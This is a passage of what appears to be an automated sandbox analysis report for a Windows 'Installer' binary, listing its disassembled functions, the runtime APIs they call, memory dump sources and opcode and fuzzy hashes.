                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                                                    • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction ID: 96f4aed62ae2d163a8404596f163b5eceafb0931b0bd98938af56fa7f48f2c9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AB16872A003559FDB178F24CC81FAE7BB5EF19311F1A4165EC44AF292D6749E09C7A0
                                                                                                                                                                                                                                                    Function 00350D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350D77
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00350D7F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350E08
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00350E33
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350E88
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 83d65296d9c1f32a391af9a148a5ccf8ffdb563598edadcec49046a085388385
                                                                                                                                                                                                                                                    • Instruction ID: c6287b19c1afe775174186bed26e7265ea659ccbdde235811069c73e79348750
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83d65296d9c1f32a391af9a148a5ccf8ffdb563598edadcec49046a085388385
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50410534A006189BCF17DF68C886E9EBBF5AF45311F258455ED186F362D732AD09CB90
                                                                                                                                                                                                                                                    Function 00343C70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343CA5
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343CBF
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00343CE0
                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 00343D92
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00343DD8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                                    • String ID: e.7
                                                                                                                                                                                                                                                    • API String ID: 3087743877-48725242
                                                                                                                                                                                                                                                    • Opcode ID: 5d4835d15f0e1cbd73eefeed43dcc13759f11e729d521fd42f981f292b60d987
                                                                                                                                                                                                                                                    • Instruction ID: 5f421ebfc39ebd575b3ee4ae95ba7811c64cb0905f9056809b7b848e2f241394
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d4835d15f0e1cbd73eefeed43dcc13759f11e729d521fd42f981f292b60d987
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43412471E006188FCB26DF98D845BAEB7F5BB88720F058219D8196F391DB35AA41CF91
                                                                                                                                                                                                                                                    Function 003424B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleWindow.KERNEL32 ref: 003424DD
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 003424E6
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00342524
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0034253A,?,?,00000000), ref: 0034F129
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0034253A,?,?,00000000), ref: 0034F142
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: CloseHandle.KERNEL32(?,?,?,0034253A,?,?,00000000), ref: 0034F154
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342567
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342578
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342589
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0034259A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3956949563-0
                                                                                                                                                                                                                                                    • Opcode ID: 0db8c3b5bcdb0c04f8dde73cec30c985d1d0c51d04760aa19b33e6c09c7a1102
                                                                                                                                                                                                                                                    • Instruction ID: 2c8a740766a7d515d8ecb75ffee1ce2b2aa4b59a0e0ed38ab1b06a6d59380b5c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0db8c3b5bcdb0c04f8dde73cec30c985d1d0c51d04760aa19b33e6c09c7a1102
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 472174F2D402159BDF12AF949C06BDFBAF8AF04710F080165F9087E291E7B6B554CBA6
                                                                                                                                                                                                                                                    Function 0035CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,0035D01A,00341170,0034AA08,?,?), ref: 0035CFCC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                    • Opcode ID: f8608a2687a9ae2a0c022313fa8d6f8727e5bc3deecbbd76761d8a31658c17cb
                                                                                                                                                                                                                                                    • Instruction ID: 657c2cce6cffb0c270b6987f3b3fe28868177f020f009fd6f6d6db500577adeb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8608a2687a9ae2a0c022313fa8d6f8727e5bc3deecbbd76761d8a31658c17cb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F210231A11711AFCB338B64DC51E5AB76EDF4176AF261111ED0AA72A0DB30ED08CBD0
                                                                                                                                                                                                                                                    Function 00350080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00350086
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00350094
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 003500A5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                    • Opcode ID: a78279016db0e105796bff3dfa2a4c3ccc38c584e7334cb60eb4e52104d03210
                                                                                                                                                                                                                                                    • Instruction ID: 22bb88bbdf0eaba090eb5ed19d01c28d6ce326d76497271f9966139a2d351e1a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a78279016db0e105796bff3dfa2a4c3ccc38c584e7334cb60eb4e52104d03210
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48D05E31515611AB83336F747C0A8CD3AACFB09700B018066F40CD2250DB7846808B55
                                                                                                                                                                                                                                                    Function 00364F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 77381f4de6212eb5be665cf58c38c59a693a4d12b686aec2292e4ef5dc28e891
                                                                                                                                                                                                                                                    • Instruction ID: 2c30dbdd3e1e02bb5f2b1b9648e6e84977140788c8a023917e60d7d0a364c5bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77381f4de6212eb5be665cf58c38c59a693a4d12b686aec2292e4ef5dc28e891
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFB13974E08A499FDF13CFA8D851FADBBB4BF45304F148168E9056B396C7709941CBA0
                                                                                                                                                                                                                                                    Function 00349B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349C97
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349CA8
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349CBC
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349CDD
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349CEE
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00349D06
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2134207285-0
                                                                                                                                                                                                                                                    • Opcode ID: 76200910d99c365ff2498cc334091e5a7efee250a1174041ce7995431ac5614f
                                                                                                                                                                                                                                                    • Instruction ID: 5853e9132e6275034fc5f4a4bc11d36b1f584bec4b84c4415866b5376c419cd4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76200910d99c365ff2498cc334091e5a7efee250a1174041ce7995431ac5614f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E641B0B5900740CBDB329F658946BABB7F8BF45320F18062ED57A2E2D1D771B904CB92
                                                                                                                                                                                                                                                    Function 0035ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0035ACDE,00350760,0034B77F,BB40E64E,?,?,?,?,0036BFCA,000000FF), ref: 0035ACF5
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0035AD03
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0035AD1C
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,0035ACDE,00350760,0034B77F,BB40E64E,?,?,?,?,0036BFCA,000000FF), ref: 0035AD6E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 6a76312f6f15c84f5e5754c21f6659e176dadbbccdd14e2e4feed7a7d54d59a6
                                                                                                                                                                                                                                                    • Instruction ID: 14e43dcd9a7b5f8a5cedc4bbc4128f24ee9c6e686fbe45b3b95638d79b7185c0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a76312f6f15c84f5e5754c21f6659e176dadbbccdd14e2e4feed7a7d54d59a6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E01F932205A159EE73736746C96D2666F8EB01B73B20032EFA24565F0EF1148466181
                                                                                                                                                                                                                                                    Function 0035B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0035B68D
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0035B906
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                    • Opcode ID: e28fffb52756845bef3db5280c118e9d3f393887d4dfc0443f813dd341aed89e
                                                                                                                                                                                                                                                    • Instruction ID: e6d74ff29051f218c6f1ecf89e93e4d02282d616f5121435d9f7b79ddc995546
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e28fffb52756845bef3db5280c118e9d3f393887d4dfc0443f813dd341aed89e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24B14871800209EFCF1ADFA4C881DAEB7B9BF04312F16455AEC11AB222D731DA59DB91
                                                                                                                                                                                                                                                    Function 0034BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034BF44
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034C028
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: 868a1655a2f8a1b924dbc61b8e2d3783b835c1ff00188c832ee9586cdcc75f49
                                                                                                                                                                                                                                                    • Instruction ID: 7c14c02b99a1ba0353c90b5d36609c42d46d2b1127f6db6f30b5955878be6de1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 868a1655a2f8a1b924dbc61b8e2d3783b835c1ff00188c832ee9586cdcc75f49
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7418974900209DFCB2ADF68C9459ADF7F9AF48300B59805DE44AAF652C734FA49CB52
                                                                                                                                                                                                                                                    Function 003555C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0036BE94,000000FF,?,00355685,?,?,00355721,00000000), ref: 003555F9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,0036BE94,000000FF,?,00355685,?,?,00355721,00000000), ref: 0035560B
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0036BE94,000000FF,?,00355685,?,?,00355721,00000000), ref: 0035562D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: 5aba878caad82e3e92ef3dcc4e135e6b9babfc44f3b0f01c735265b554f8f78d
